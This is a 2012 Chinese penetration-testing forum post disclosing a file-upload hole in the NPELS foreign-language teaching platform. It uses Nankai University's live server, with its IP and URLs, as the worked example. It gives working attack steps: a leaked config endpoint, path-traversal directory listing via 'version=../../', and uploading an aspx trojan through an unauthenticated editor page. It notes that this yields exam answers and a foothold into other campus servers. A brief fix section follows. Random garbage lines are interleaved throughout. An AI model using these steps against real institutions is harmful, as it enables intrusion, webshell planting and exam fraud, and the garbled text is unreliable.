中国网络渗透测试联盟
标题:
新理念外语网络教学平台文件上传漏洞
[打印本页]
作者:
admin
时间:
2012-12-4 11:10
标题:
新理念外语网络教学平台文件上传漏洞
好多大学都在用这个教学平台,这个漏洞会导致直接拿到试题答案,甚至作为跳板继续渗透进入学校其他服务器中
2 [( V, T5 m- c5 G
" f) }/ n& ^- T0 S
详细说明:
+ z: W2 s1 y( M/ O) T0 j/ u
8 I9 X3 z9 e( f1 v/ S& E2 e
以南开大学的为例:
' u$ W: S$ G/ i8 o% t9 p0 i3 h, T; Y
http://222.30.60.3/NPELS
2 B- E5 x, X' o6 v6 Q+ z. l
NPELS_LearningCenter_5.0 客户端下的 Update.exe.config 文件泄露一个重要地址
% T, M2 N) s' M! [
<setting name="Update_CommonSvr_CommonService" serializeAs="String">
: c8 s. P! J0 T, w y1 Y1 J
<value>http://222.30.60.3/NPELS/CommonService.asmx</value>
7 y' ^& g5 M! l# J$ m! T4 x
</setting>
T1 h/ R. c% u" B
及版本号
8 l4 w* E u: h# y; O; Q, k
<add key="TVersion" value="1, 0, 0, 2187">
, [ r9 O$ y" L$ H9 `2 A9 t
</add>
/ J. l ]$ B/ F, U3 \+ H
直接访问
* n! f8 i3 j; c
http://222.30.60.3/NPELS/CommonService.asmx
( i% s7 s9 p6 e0 W1 V
使用GetTestClientFileList操作,直接 HTTP GET 列目录:
; I3 m& Z, T4 E; `1 f; x& Y
http://222.30.60.3/NPELS/CommonS ... tFileList?version=1
, 0, 0, 2187
4 r r3 T9 D+ @3 h; H4 l, E
进一步列目录(返回的网页很大,可以直接 wget 下来)
2 w( s% Y7 D) Q7 M1 E& E' T" w8 M8 K2 ?
http://222.30.60.3/NPELS/CommonS ... List?version=../../
4 n! D! E8 ?6 r2 J0 l- u* T
9 B1 g+ H+ I r, a' V# ~* G; B7 C( F* F
发现
& x/ N0 B6 P+ i( E4 ]; t6 A% A
http://zzxx.nankai.edu.cn/npelsv/editor/editor.htm
/ D& x, [$ n$ R' V8 L
可以上传,直接上传aspx木马即可,不需要改后缀名或者文件头
. G% o5 ~# P3 g; G# C- i
上传后继续列目录找到木马地址直接访问即可
+ k4 O; @5 l% P8 ?6 q: T* N
* C0 x% y# P; ]) i# l9 S
OOXX
6 Q- Z* r+ V7 m& i! q
% P b! M3 K7 Y; P
Google "新理念外语网络教学平台" 测试了几个其他的站,都有类似的列目录上传方法
% S0 [0 X+ Q$ l1 P, S* f
漏洞证明:
7 G; O1 m! R1 v, C$ s- A& X% |
6 S. F4 r+ ? G z2 E8 r$ F
列目录:
8 V y1 V- J0 [, o
http://222.30.60.3/NPELS/CommonS ... List?version=../../
2 D& R, {0 b' a, b: d
文件上传:
$ n0 a4 B# u2 ^; q5 Z: c* G
http://222.30.60.3/npelsv/editor/editor.htm
- c4 R0 j9 K6 R+ ^8 w, y
4 ^$ g8 I* Y9 X" V% P( ~! `
上传木马:
: ]" i- B6 w' B( O' N
http://222.30.60.3/npelsv/editor/uploadfiles/1.aspx
2 F, }( D+ k% w2 O" f; W) v" ~- d& w
p5 n& } u# T- W# g4 X+ r3 x% C
修复方案:
# ?. V) \1 r9 n8 [; u1 g
好像考试系统必须使用 CommonService.asmx
, i4 ]$ I" q, Q) q$ _ i4 H
最好配置文件加密或者用别的方式不让它泄露出来
' k5 C3 t* t; f$ S+ Y9 l
并且检查或删除各上传入口,像
http://222.30.60.3/NPELS/Upload.aspx
一样
0 y5 d S8 D8 U5 r9 j. g
欢迎光临 中国网络渗透测试联盟 (https://cobjon.com/)
Powered by Discuz! X3.2